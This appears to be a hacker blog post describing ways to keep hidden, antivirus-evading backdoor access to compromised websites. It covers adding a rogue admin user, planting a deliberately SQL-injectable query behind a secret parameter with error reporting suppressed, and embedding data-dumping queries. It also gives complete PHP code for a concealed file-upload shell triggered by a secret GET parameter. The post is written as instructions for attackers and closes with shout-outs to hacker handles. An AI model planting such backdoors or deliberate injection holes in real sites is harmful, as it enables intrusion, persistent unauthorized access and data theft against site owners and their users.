In the Name of ALLAH the most Beneficent and the Merciful
I was thinking that our backdoors got removed how and why, than i talked to web admins and server admins, they stated that “We run anti-virus on weekly basis and some scripts(written in different languages like perl etc) which are signature based they find the badcode(backdoors) for us and remove these”.
So i thought to find a good way of leaving backdoors (other than fudding ur shell — i have been using that and that is also a successful technique though :D)
Well today i want to discuss purely the SQL related backdoors.
Method 1 :
Most common method is to add another admin user, and there is 0.5% chances that user is removed by the admin, because no site admin look for that and most of the penetration tester don’t pay attention to that.
Method 2:
Add a query in any page that is vulnerable to SQL injection , and name yours parameter a weired one eg Crapish jux kidding u can name any. and dont forget to put error_reporting(0) after the starting php tag. otherwise when the parameter is missing it will cause an error on page.
Demo :
e.g. we are editing the products page. we jux need to put these lines any where inside the page.
now the antivirus will never point it as a backdoor and neither the scripts, and as you can see that this script is injectable you can inject the page any time while param is also hidden from the other people and u can name the parameter of whatever u want to. and u can patch the sites other parameters also to maintain ur access..
and you can inject it like
http://www.S_xxx_S.com/products.php?product = [ Inject Here ]
Method 3:
This is my Optimized method because some sites are secured with some shitty firewalls, when u injected that or after u backdoored it so jux make some if else statements and put some Osum queries there which can get u all the info you need like this
this is jux about idea.. you can do in any way you want to
Demo :
to get only tables
to get the columns also
to dump the data
Method 4 :-
You can inject your upload script in any file with a parameter like hacked or something else
Here is the Code:-
<?php if($_GET['id']=='your parameter')
{
echo 'hacker<br>';
echo '<br>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }
else { echo '<b>Upload !!!</b><br><br>'; }
}
}
?>
<?php
thats all for today.. thanx for reading this..
Love For
| Lafangoo | Connecting | Ch3rn0by1 | exploiter-z | madcodE | PMH`s Str!k3r | Mauratania Attacker | Hussein Haxor | MakMan | BlackHawk | Zen | Rahul | Gujjar (PCP) | rootxx |
0 comments:
Post a Comment